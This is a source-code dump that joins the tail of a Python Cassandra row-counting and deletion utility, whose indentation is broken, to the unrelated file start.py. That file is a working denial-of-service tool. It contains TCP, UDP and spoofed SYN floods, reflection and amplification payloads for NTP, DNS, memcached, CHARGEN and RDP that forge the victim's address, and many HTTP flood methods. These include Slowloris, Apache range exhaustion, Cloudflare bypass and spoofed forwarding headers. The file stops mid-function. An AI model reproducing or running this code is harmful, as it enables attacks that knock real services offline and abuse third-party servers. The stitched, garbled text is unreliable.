sql_statement = sql_template.format(keyspace=rsettings.keyspace, table=rsettings.table)
count = 0
aggregate = True
mt = Mapper_task(sql_statement, rsettings.key, rsettings.filter_string)
    mt.parser = count_result_parser
queues.mapper_queue.put(mt)
total = 0
while True:
if queues.results_queue.empty():
logging.debug("Waiting on results...")
logging.debug("Total so far: {}".format(total))
time.sleep(5)
else:
res = queues.results_queue.get()
if res is False:
# kill pill received
# end the loop and present the results
break
queues.stats_queue_results_consumed.put(0)
total += res.value
# send kill signal to process manager to stop all workers
queues.kill.set()
time.sleep(4) # wait for the kill event to reach all processes
return total
    # Unreachable reference code below, kept from the wide partition finder
    # (it produced the non-aggregated, per-split counts):
# unaggregated_count = []
# while result.qsize() > 0:
# r = result.get()
# if aggregate:
# count += r.value[0].count
# else:
# split_count = Result(r.min, r.max, r.value[0])
# unaggregated_count.append(split_count)
# if aggregate:
# return count
# else:
# return unaggregated_count
def print_rows(queues, rsettings):
for row in get_rows(queues, rsettings):
print(row)
def find_wide_partitions(session,
keyspace,
table,
key,
split,
value_column=None,
filter_string=None):
# select count(*) from everywhere, record all the split sizes
# get back a list of dictionaries [ {'min': 123, 'max',124, 'count':1 } ]
# sort it by 'count' and show top 5 or something
# get rows count, but don't aggregate
count = get_rows_count(session, keyspace, table, key, split, filter_string,
False)
# now we have count of rows per split, let's sort it
count.sort(key=lambda x: x.value, reverse=True)
# now that we know the most highly loaded splits, we can drill down
most_loaded_split = count[0]
token_range = Token_range(most_loaded_split.min, most_loaded_split.max)
most_loaded_split_count = get_rows_count(session,
keyspace,
table,
key,
split=14,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count.sort(key=lambda x: x.value, reverse=True)
token_range = Token_range(most_loaded_split_count[0].min,
most_loaded_split_count[0].max)
most_loaded_split_count2 = get_rows_count(session,
keyspace,
table,
key,
split=12,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count2.sort(key=lambda x: x.value, reverse=True)
token_range = Token_range(most_loaded_split_count2[0].min,
most_loaded_split_count2[0].max)
most_loaded_split_count3 = get_rows_count(session,
keyspace,
table,
key,
split=10,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count3.sort(key=lambda x: x.value, reverse=True)
# narrow it down to 100 million split size
token_range = Token_range(most_loaded_split_count3[0].min,
most_loaded_split_count3[0].max)
most_loaded_split_count4 = get_rows_count(session,
keyspace,
table,
key,
split=8,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count4.sort(key=lambda x: x.value, reverse=True)
# narrow it down to 1 million split size
token_range = Token_range(most_loaded_split_count4[0].min,
most_loaded_split_count4[0].max)
most_loaded_split_count5 = get_rows_count(session,
keyspace,
table,
key,
split=6,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count5.sort(key=lambda x: x.value, reverse=True)
# narrow it down to 1 thousand split size
token_range = Token_range(most_loaded_split_count5[0].min,
most_loaded_split_count5[0].max)
most_loaded_split_count6 = get_rows_count(session,
keyspace,
table,
key,
split=3,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count6.sort(key=lambda x: x.value, reverse=True)
# narrow it down to 10 split size
token_range = Token_range(most_loaded_split_count6[0].min,
most_loaded_split_count6[0].max)
most_loaded_split_count7 = get_rows_count(session,
keyspace,
table,
key,
split=1,
filter_string=None,
aggregate=False,
token_range=token_range)
most_loaded_split_count7.sort(key=lambda x: x.value, reverse=True)
print(most_loaded_split)
print(most_loaded_split_count[0])
print(most_loaded_split_count2[0])
print(most_loaded_split_count3[0])
print(most_loaded_split_count4[0]) # 100 million precision
print(most_loaded_split_count5[0]) # 1 million precision
print(most_loaded_split_count6[0]) # 1 thousand precision
print(most_loaded_split_count7[0]) # 10 precision
# .......
def print_rows_count(queues, rsettings):
count = get_rows_count(queues, rsettings)
print("Total amount of rows in {keyspace}.{table} is {count}".format(
keyspace=rsettings.keyspace, table=rsettings.table, count=count))
def queue_monitor(queues, rsettings):
while not queues.kill.is_set():
logging.debug("Queue status:")
logging.debug("Split queue full: {} empty: {}".format(queues.split_queue.full(), queues.split_queue.empty()))
logging.debug("Map queue full: {} empty: {}".format(queues.mapper_queue.full(), queues.mapper_queue.empty()))
logging.debug("Worker queue full: {} empty: {}".format(queues.worker_queue.full(), queues.worker_queue.empty()))
logging.debug("Results queue full: {} empty: {}".format(queues.results_queue.full(), queues.results_queue.empty()))
time.sleep(5)
else:
logging.debug("Queue monitor exiting.")
def process_manager(queues, rsettings):
# queue monitor
qmon_process = multiprocessing.Process(target=queue_monitor, args=(queues, rsettings))
qmon_process.start()
# stats monitor
smon_process = multiprocessing.Process(target=stats_monitor, args=(queues, rsettings))
smon_process.start()
# start splitter
splitter_process = multiprocessing.Process(target=splitter, args=(queues, rsettings))
splitter_process.start()
# mapper
mapper_process = multiprocessing.Process(target=mapper, args=(queues,rsettings))
mapper_process.start()
# TODO: remove this, as reducer is not used
# reducer
#reducer_process = multiprocessing.Process(target=reducer, args=(queues,rsettings))
#reducer_process.start()
workers = []
for w in range(rsettings.workers):
# workers
worker_process = multiprocessing.Process(target=cassandra_worker, args=(queues,rsettings))
worker_process.start()
workers.append(worker_process)
while not queues.kill.is_set():
        for w in list(workers):  # iterate over a snapshot; the list is modified below
if not w.is_alive():
logging.warning("Process {} died.".format(w))
workers.remove(w)
time.sleep(1)
logging.warning("Starting a new process")
worker_process = multiprocessing.Process(target=cassandra_worker, args=(queues, rsettings))
worker_process.start()
workers.append(worker_process)
time.sleep(1)
else:
logging.debug("Global kill event! Process manager is stopping.")
def reducer2(queues, rsettings):
"""Filter out the relevant information from Cassandra results"""
pid = os.getpid()
print("Reducer started")
while True:
# wait for work
if queues.reducer_queue.empty():
logging.debug("Reducer {} waiting for work".format(pid))
time.sleep(2)
else:
result = queues.reducer_queue.get()
logging.debug("Got task {} from reducer queue".format(result))
for row in result.value:
queues.results_queue.put(row)
def utc_time(value):
if isinstance(value, datetime.datetime):
value = value.replace(tzinfo=datetime.timezone.utc)
return value
def count_result_parser(row, rsettings=None):
return row.count
def get_result_parser(row, rsettings=None):
results_that_we_care_about = {}
results_that_we_care_about[rsettings.key] = getattr(row, rsettings.key)
results_that_we_care_about[rsettings.extra_key] = getattr(row, rsettings.extra_key)
return results_that_we_care_about
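# A parser (see count_result_parser / get_result_parser above) receives a result row
# plus the runtime settings and returns whatever should be pushed onto the results
# queue. A hedged sketch of a custom parser -- the "created_at" column is hypothetical:
#
#     def created_at_parser(row, rsettings=None):
#         return getattr(row, "created_at", None)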
def cassandra_worker(queues, rsettings):
"""Executes SQL statements and puts results in result queue"""
cas_settings = rsettings.cas_settings
pid = os.getpid()
if "," in cas_settings.host:
host = random.choice(cas_settings.host.split(","))
logging.info("Picking random host: {}".format(host))
else:
host = cas_settings.host
    # Starting a bunch of sessions at the same time might not be ideal,
    # so we add a bit of random delay.
if rsettings.worker_max_delay_on_startup > 0:
time.sleep(random.choice(range(rsettings.worker_max_delay_on_startup)))
session = get_cassandra_session(host, cas_settings.port, cas_settings.user,
cas_settings.password, cas_settings.ssl_cert, cas_settings.ssl_key, cas_settings.dc, cas_settings.cacert,
cas_settings.ssl_v1 )
sql = "use {}".format(rsettings.keyspace)
logging.debug("Executing SQL: {}".format(sql))
session.execute(sql)
if not session.is_shutdown:
logging.debug("Worker {} connected to Cassandra.".format(pid))
while not queues.kill.is_set():
# wait for work
if queues.worker_queue.empty():
logging.debug("Worker {} waiting for work".format(pid))
time.sleep(2)
else:
task = queues.worker_queue.get()
if task is False:
# kill pill received
# pass it to the results queue
queues.results_queue.put(False)
continue # and return back to waiting for work
logging.debug("Got task {} from worker queue".format(task))
try:
r = session.execute(task.sql)
            except Exception as exc:
                logging.warning("Cassandra connection issue: {}".format(exc))
                return False
if task.task_type == "delete":
queues.stats_queue_deleted.put(0)
logging.debug("DELETE: {}".format(task.sql))
else:
for row in r:
logging.debug(row)
if task.parser:
row = task.parser(row, rsettings)
res = Result(task.split_min, task.split_max, row)
logging.debug(res)
queues.results_queue.put(res)
queues.stats_queue_results.put(0)
else:
logging.debug("Worker stopping due to kill event.")
def mapper(queues, rsettings):
"""Prepares SQL statements for worker and puts tasks in worker queue"""
try:
        map_task = queues.mapper_queue.get(True, 10)  # initially, wait up to 10 sec to receive the first work order
except:
logging.warning("Mapper did not receive any work...timed out.")
return False
print("mapper Received work assignment::: {}".format(map_task.sql_statement))
while True:
if queues.split_queue.empty():
logging.debug("Split queue empty. Mapper is waiting")
time.sleep(1)
else:
split = queues.split_queue.get()
if split is False:
# this is a kill pill, no more work, let's relax
logging.debug("Mapper has received kill pill, passing it on to workers and exiting.")
queues.worker_queue.put(False) # pass the kill pill
return True
if rsettings.extra_key:
sql = "{statement} where token({key}, {extra_key}) >= {min} and token({key}, {extra_key}) < {max}".format(statement=map_task.sql_statement, key=map_task.key_column, extra_key=rsettings.extra_key, min=split[0], max=split[1])
else:
sql = "{statement} where token({key}) >= {min} and token({key}) < {max}".format(statement=map_task.sql_statement, key=map_task.key_column, min=split[0], max=split[1])
if rsettings.filter_string:
sql = "{} and {}".format(sql, rsettings.filter_string)
t = CassandraWorkerTask(sql, split, map_task.parser)
queues.worker_queue.put(t)
queues.stats_queue_mapper.put(0)
logging.debug("Mapper prepared work task: {}".format(sql))
if __name__ == "__main__":
py_version = platform.python_version_tuple()
if int(py_version[0]) < 3:
logging.info("Python 3.6 or newer required. 3.7 recommended.")
sys.exit(1)
args = parse_user_args()
if args.debug:
logging.basicConfig(level=logging.DEBUG)
logging.debug('Logging started.')
else:
logging.basicConfig(level=logging.INFO)
# TODO: move this to runtime settings constructor
if args.min_token and args.max_token:
tr = Token_range(args.min_token, args.max_token)
else:
tr = Token_range(settings.default_min_token, settings.default_max_token)
cas_settings = CassandraSettings()
cas_settings.host = args.host
# some of the settings can be specified either on command line
# or in the settings file
if hasattr(settings, "db_user"):
cas_settings.user = settings.db_user
else:
cas_settings.user = args.user
if hasattr(settings, "db_password"):
cas_settings.password = settings.db_password
else:
cas_settings.password = args.password
if hasattr(settings, "ssl_cert"):
cas_settings.ssl_cert = settings.ssl_cert
else:
cas_settings.ssl_cert = args.ssl_cert
if hasattr(settings, "ssl_key"):
cas_settings.ssl_key = settings.ssl_key
else:
cas_settings.ssl_key = args.ssl_key
if hasattr(settings, "cacert"):
cas_settings.cacert = settings.ssl_cacert
else:
cas_settings.cacert = args.cacert
cas_settings.dc = args.datacenter
cas_settings.port = args.port
cas_settings.ssl_v1 = args.ssl_v1
queues = Queues()
rsettings = RuntimeSettings()
rsettings.keyspace = args.keyspace
rsettings.table = args.table
rsettings.split = args.split
rsettings.key = args.key
rsettings.extra_key = args.extra_key
rsettings.filter_string = args.filter_string
rsettings.tr = tr
rsettings.cas_settings = cas_settings
rsettings.workers = args.workers
if rsettings.workers > 10:
# if more than 10 workers are used, we add delay to their startup logic
rsettings.worker_max_delay_on_startup = rsettings.workers * 2
pm = multiprocessing.Process(target=process_manager, args=(queues, rsettings))
pm.start()
# TODO: needs re-implementation
if args.action == "find-nulls":
find_null_cells(args.keyspace, args.table, "id", "comment")
elif args.action == "count-rows":
print_rows_count(queues, rsettings)
elif args.action == "print-rows":
print_rows(queues, rsettings)
elif args.action == "delete-rows":
delete_rows(queues, rsettings)
# TODO: needs re-implementation
elif args.action == "find-wide-partitions":
find_wide_partitions(args.keyspace, args.table, args.key,
args.split, args.value_column, args.filter_string)
# TODO: needs re-implementation
elif args.action == "update-rows":
update_rows(args.keyspace, args.table, args.key,
args.update_key, args.update_value, args.split,
args.filter_string, args.extra_key)
else:
# this won't be accepted by argparse anyways
sys.exit(1)
|
start.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from contextlib import suppress
from itertools import cycle
from json import load
from math import trunc, log2
from os import urandom as randbytes
from pathlib import Path
from random import randint, choice as randchoice
from socket import (IP_HDRINCL, IPPROTO_IP, IPPROTO_TCP, TCP_NODELAY, SOCK_STREAM, AF_INET, socket,
SOCK_DGRAM, SOCK_RAW, gethostname, gethostbyname)
from ssl import SSLContext, create_default_context, CERT_NONE
from sys import argv, exit
from threading import Thread, Event, Lock
from time import sleep
from typing import Set, List, Any, Tuple
from urllib import parse
from PyRoxy import Proxy, Tools as ProxyTools, ProxyUtiles, ProxyType, ProxyChecker
from certifi import where
from cfscrape import create_scraper
from icmplib import ping
from impacket.ImpactPacket import IP, TCP, UDP, Data
from psutil import process_iter, net_io_counters, virtual_memory, cpu_percent
from requests import get, Session, exceptions
from yarl import URL
localIP = get('http://ip.42.pl/raw').text
currentDir = Path(__file__).parent
ctx: SSLContext = create_default_context(cafile=where())
ctx.check_hostname = False
ctx.verify_mode = CERT_NONE
__version__ = "2.0 SNAPSHOT"
class Methods:
LAYER7_METHODS: Set[str] = {"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS",
"DYN", "SLOW", "HEAD", "NULL", "COOKIE", "PPS",
"EVEN", "GSB", "DGB", "AVB", "CFBUAM", "APACHE",
"XMLRPC", "BOT"}
LAYER4_METHODS: Set[str] = {"TCP", "UDP", "SYN", "VSE", "MINECRAFT", "MEM",
"NTP", "DNS", "ARD", "CHAR", "RDP"}
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
google_agents = ["Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
"+http://www.google.com/bot.html)) "
"Googlebot/2.1 (+http://www.google.com/bot.html)",
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"]
class Tools:
@staticmethod
def humanbytes(i: int, binary: bool = False, precision: int = 2):
MULTIPLES = ["B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"]
if i > 0:
base = 1024 if binary else 1000
multiple = trunc(log2(i) / log2(base))
value = i / pow(base, multiple)
suffix = MULTIPLES[multiple].format("i" if binary else "")
return f"{value:.{precision}f} {suffix}"
else:
return f"-- B"
@staticmethod
def humanformat(num: int, precision: int = 2):
suffixes = ['', 'k', 'm', 'g', 't', 'p']
if num > 999:
obje = sum([abs(num / 1000.0 ** x) >= 1 for x in range(1, len(suffixes))])
return f'{num / 1000.0 ** obje:.{precision}f}{suffixes[obje]}'
else:
return num
# noinspection PyBroadException
class Layer4:
_method: str
_target: Tuple[str, int]
_ref: Any
SENT_FLOOD: Any
_amp_payloads = cycle
def __init__(self, target: Tuple[str, int],
ref: List[str] = None,
method: str = "TCP",
synevent: Event = None):
self._amp_payload = None
self._amp_payloads = cycle([])
self._ref = ref
self._method = method
self._target = target
self._synevent = synevent
self.run()
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while 1:
with suppress(Exception):
while 1:
self.SENT_FLOOD()
def select(self, name):
self.SENT_FLOOD = self.TCP
if name == "UDP": self.SENT_FLOOD = self.UDP
if name == "SYN": self.SENT_FLOOD = self.SYN
if name == "VSE": self.SENT_FLOOD = self.VSE
if name == "MINECRAFT": self.SENT_FLOOD = self.MINECRAFT
if name == "RDP":
self._amp_payload = (b'\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00', 3389)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "MEM":
self._amp_payload = (b'\x00\x01\x00\x00\x00\x01\x00\x00gets p h e\n', 11211)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "CHAR":
self._amp_payload = (b'\x01', 19)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "ARD":
self._amp_payload = (b'\x00\x14\x00\x00', 3283)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "NTP":
self._amp_payload = (b'\x17\x00\x03\x2a\x00\x00\x00\x00', 123)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
if name == "DNS":
self._amp_payload = (b'\x45\x67\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x02\x73\x6c\x00\x00\xff\x00\x01\x00'
b'\x00\x29\xff\xff\x00\x00\x00\x00\x00\x00', 53)
self.SENT_FLOOD = self.AMP
self._amp_payloads = cycle(self._generate_amp())
def TCP(self) -> None:
try:
with socket(AF_INET, SOCK_STREAM) as s:
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
while s.send(randbytes(1024)):
continue
except Exception:
s.close()
def MINECRAFT(self) -> None:
try:
with socket(AF_INET, SOCK_STREAM) as s:
s.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
s.connect(self._target)
s.send(b'\x0f\x1f0\t' + self._target[0].encode() + b'\x0fA')
while s.send(b'\x01'):
s.send(b'\x00')
except Exception:
s.close()
def UDP(self) -> None:
try:
with socket(AF_INET, SOCK_DGRAM) as s:
while s.sendto(randbytes(1024), self._target):
continue
except Exception:
s.close()
def SYN(self) -> None:
try:
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while s.sendto(self._genrate_syn(), self._target):
continue
except Exception:
s.close()
def AMP(self) -> None:
try:
with socket(AF_INET, SOCK_RAW, IPPROTO_TCP) as s:
s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1)
while s.sendto(*next(self._amp_payloads)):
continue
except Exception:
s.close()
def VSE(self) -> None:
try:
with socket(AF_INET, SOCK_DGRAM) as s:
while s.sendto((b'\xff\xff\xff\xff\x54\x53\x6f\x75\x72\x63\x65\x20\x45\x6e\x67\x69\x6e\x65'
b'\x20\x51\x75\x65\x72\x79\x00'), self._target):
continue
except Exception:
s.close()
def _genrate_syn(self) -> bytes:
ip: IP = IP()
ip.set_ip_src(localIP)
ip.set_ip_dst(self._target[0])
tcp: TCP = TCP()
tcp.set_SYN()
tcp.set_th_dport(self._target[1])
tcp.set_th_sport(randint(1, 65535))
ip.contains(tcp)
return ip.get_packet()
def _generate_amp(self):
payloads = []
for ref in self._ref:
ip: IP = IP()
ip.set_ip_src(self._target[0])
ip.set_ip_dst(ref)
ud: UDP = UDP()
ud.set_uh_dport(self._amp_payload[1])
ud.set_uh_sport(self._target[1])
ud.contains(Data(self._amp_payload[0]))
ip.contains(ud)
payloads.append((ip.get_packet(), (ref, self._amp_payload[1])))
return payloads
# noinspection PyBroadException
class HttpFlood:
_proxies: List[Proxy] = None
_payload: str
_defaultpayload: Any
_req_type: str
_useragents: List[str]
_referers: List[str]
_target: URL
_method: str
_rpc: int
_synevent: Any
SENT_FLOOD: Any
def __init__(self, target: URL, method: str = "GET", rpc: int = 1,
synevent: Event = None, useragents: Set[str] = None,
referers: Set[str] = None,
proxies: Set[Proxy] = None) -> None:
self.SENT_FLOOD = None
self._synevent = synevent
self._rpc = rpc
self._method = method
self._target = target
self._raw_target = (self._target.host, (self._target.port or 80))
if not self._target.host[len(self._target.host) - 1].isdigit():
self._raw_target = (gethostbyname(self._target.host), (self._target.port or 80))
if not referers:
referers: List[str] = ["https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=",
",https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer"
"/sharer.php?u=",
",https://drive.google.com/viewerng/viewer?url=",
",https://www.google.com/translate?u="]
self._referers = list(referers)
if proxies:
self._proxies = list(proxies)
if not useragents:
useragents: List[str] = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 '
'Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0']
self._useragents = list(useragents)
self._req_type = self.getMethodType(method)
self._defaultpayload = "%s %s HTTP/1.1\r\n" % (self._req_type, target.raw_path_qs)
self._payload = (self._defaultpayload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
self.run()
def run(self) -> None:
if self._synevent: self._synevent.wait()
self.select(self._method)
while 1:
with suppress(Exception):
while 1:
self.SENT_FLOOD()
@property
def SpoofIP(self) -> str:
spoof: str = ProxyTools.Random.rand_ipv4()
payload: str = ""
payload += "X-Forwarded-Proto: Http\r\n"
payload += f"X-Forwarded-Host: {self._target.raw_host}, 1.1.1.1\r\n"
payload += f"Via: {spoof}\r\n"
payload += f"Client-IP: {spoof}\r\n"
payload += f'X-Forwarded-For: {spoof}\r\n'
payload += f'Real-IP: {spoof}\r\n'
return payload
def generate_payload(self, other: str = None) -> bytes:
payload: str | bytes = self._payload
payload += "Host: %s\r\n" % self._target.authority
payload += self.randHeadercontent
payload += other if other else ""
return str.encode(f"{payload}\r\n")
def open_connection(self) -> socket:
if self._proxies:
sock = randchoice(self._proxies).open_socket(AF_INET, SOCK_STREAM)
else:
sock = socket()
sock.setsockopt(IPPROTO_TCP, TCP_NODELAY, 1)
sock.connect(self._raw_target)
if self._target.scheme.lower() == "https":
sock = ctx.wrap_socket(sock, server_hostname=self._target.host, server_side=False,
do_handshake_on_connect=True, suppress_ragged_eofs=True)
return sock
@property
def randHeadercontent(self) -> str:
payload: str = ""
payload += f"User-Agent: {randchoice(self._useragents)}\r\n"
payload += f"Referrer: {randchoice(self._referers)}{parse.quote(self._target.human_repr())}\r\n"
payload += self.SpoofIP
return payload
@staticmethod
def getMethodType(method: str) -> str:
return "GET" if {method.upper()} & {"CFB", "CFBUAM", "GET", "COOKIE", "OVH", "EVEN",
"STRESS", "DYN", "SLOW", "PPS", "APACHE"
"BOT"} \
else "POST" if {method.upper()} & {"POST", "XMLRPC"} \
else "HEAD" if {method.upper()} & {"GSB", "HEAD"} \
else "REQUESTS"
def POST(self) -> None:
payload: bytes = self.generate_payload(("Content-Length: 44\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}'
) % ProxyTools.Random.rand_str(32))[:-2]
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def STRESS(self) -> None:
payload: bytes = self.generate_payload((f"Content-Length: 524\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/json\r\n\r\n"
'{"data": %s}'
) % ProxyTools.Random.rand_str(512))[:-2]
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def COOKIES(self) -> None:
payload: bytes = self.generate_payload("Cookie: _ga=GA%s;"
" _gat=1;"
" __cfduid=dc232334gwdsd23434542342342342475611928;"
" %s=%s\r\n" % (randint(1000, 99999),
ProxyTools.Random.rand_str(6),
ProxyTools.Random.rand_str(32)))
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def APACHE(self) -> None:
payload: bytes = self.generate_payload("Range: bytes=0-,%s" % ",".join("5-%d" % i for i in range(1, 1024)))
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def XMLRPC(self) -> None:
payload: bytes = self.generate_payload(("Content-Length: 345\r\n"
"X-Requested-With: XMLHttpRequest\r\n"
"Content-Type: application/xml\r\n\r\n"
"<?xml version='1.0' encoding='iso-8859-1'?>"
"<methodCall><methodName>pingback.ping</methodName>"
"<params><param><value><string>%s</string></value>"
"</param><param><value><string>%s</string>"
"</value></param></params></methodCall>"
) % (ProxyTools.Random.rand_str(64),
ProxyTools.Random.rand_str(64)))[:-2]
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def PPS(self) -> None:
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(self._defaultpayload)
except Exception:
s.close()
def GET(self) -> None:
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def BOT(self) -> None:
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
s.send(str.encode(
"GET /robots.txt HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: text/plain,text/html,*/*\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n\r\n"
))
s.send(str.encode(
"GET /sitemap.xml HTTP/1.1\r\n"
"Host: %s\r\n" % self._target.raw_authority +
"Connection: Keep-Alive\r\n"
"Accept: */*\r\n"
"From: googlebot(at)googlebot.com\r\n"
"User-Agent: %s\r\n" % randchoice(google_agents) +
"Accept-Encoding: gzip,deflate,br\r\n"
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9), ProxyTools.Random.rand_str(4)) +
"If-Modified-Since: Sun, 26 Set 2099 06:00:00 GMT\r\n\r\n"
))
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def EVEN(self) -> None:
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
while s.send(payload) and s.recv(1):
continue
except Exception:
s.close()
def OVH(self) -> None:
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
for _ in range(min(self._rpc, 5)):
s.send(payload)
except Exception:
s.close()
def CFB(self):
pro = None
if self._proxies:
pro = randchoice(self._proxies)
try:
with create_scraper() as s:
for _ in range(self._rpc):
if pro:
s.get(self._target.human_repr(), proxies=pro.asRequest())
continue
s.get(self._target.human_repr())
except Exception:
s.close()
def CFBUAM(self):
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
sleep(5.01)
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def AVB(self):
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
for _ in range(self._rpc):
sleep(max(self._rpc / 1000, 1))
s.send(payload)
except Exception:
s.close()
def DGB(self):
try:
with create_scraper() as s:
for _ in range(min(self._rpc, 5)):
sleep(min(self._rpc, 5) / 100)
if self._proxies:
pro = randchoice(self._proxies)
s.get(self._target.human_repr(), proxies=pro.asRequest())
continue
s.get(self._target.human_repr())
except Exception:
s.close()
def DYN(self):
payload: str | bytes = self._payload
payload += "Host: %s.%s\r\n" % (ProxyTools.Random.rand_str(6), self._target.authority)
payload += self.randHeadercontent
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def GSB(self):
payload = "%s %s?qs=%s HTTP/1.1\r\n" % (self._req_type, self._target.raw_path_qs, ProxyTools.Random.rand_str(6))
payload = (payload +
'Accept-Encoding: gzip, deflate, br\r\n'
'Accept-Language: en-US,en;q=0.9\r\n'
'Cache-Control: max-age=0\r\n'
'Connection: Keep-Alive\r\n'
'Sec-Fetch-Dest: document\r\n'
'Sec-Fetch-Mode: navigate\r\n'
'Sec-Fetch-Site: none\r\n'
'Sec-Fetch-User: ?1\r\n'
'Sec-Gpc: 1\r\n'
'Pragma: no-cache\r\n'
'Upgrade-Insecure-Requests: 1\r\n')
payload += "Host: %s\r\n" % self._target.authority
payload += self.randHeadercontent
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def NULL(self) -> None:
payload: str | bytes = self._payload
payload += "Host: %s\r\n" % self._target.authority
payload += "User-Agent: null\r\n"
payload += "Referrer: null\r\n"
payload += self.SpoofIP
payload = str.encode(f"{payload}\r\n")
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
except Exception:
s.close()
def SLOW(self):
payload: bytes = self.generate_payload()
try:
with self.open_connection() as s:
for _ in range(self._rpc):
s.send(payload)
while s.send(payload) and s.recv(1):
for i in range(self._rpc):
s.send(str.encode("X-a: %d\r\n" % randint(1, 5000)))
sleep(self._rpc / 15)
break
except Exception:
s.close()
def select(self, name: str) -> None:
self.SENT_FLOOD = self.GET
if name == "POST": self.SENT_FLOOD = self.POST
if name == "CFB": self.SENT_FLOOD = self.CFB
if name == "CFBUAM": self.SENT_FLOOD = self.CFBUAM
if name == "XMLRPC": self.SENT_FLOOD = self.XMLRPC
if name == "BOT": self.SENT_FLOOD = self.BOT
if name == "APACHE": self.SENT_FLOOD = self.APACHE
if name == "BYPASS": self.SENT_FLOOD = self.BYPASS
if name == "OVH": self.SENT_FLOOD = self.OVH
if name == "AVB": self.SENT_FLOOD = self.AVB
if name == "STRESS": self.SENT_FLOOD = self.STRESS
if name == "DYN": self.SENT_FLOOD = self.DYN
if name == "SLOW": self.SENT_FLOOD = self.SLOW
if name == "GSB": self.SENT_FLOOD = self.GSB
if name == "NULL": self.SENT_FLOOD = self.NULL
if name == "COOKIE": self.SENT_FLOOD = self.COOKIES
if name == "PPS":
self.SENT_FLOOD = self.PPS
self._defaultpayload = (self._defaultpayload + "Host: %s\r\n\r\n" % self._target.authority).encode()
if name == "EVEN": self.SENT_FLOOD = self.EVEN
def BYPASS(self):
pro = None
if self._proxies:
pro = randchoice(self._proxies)
try:
with Session() as s:
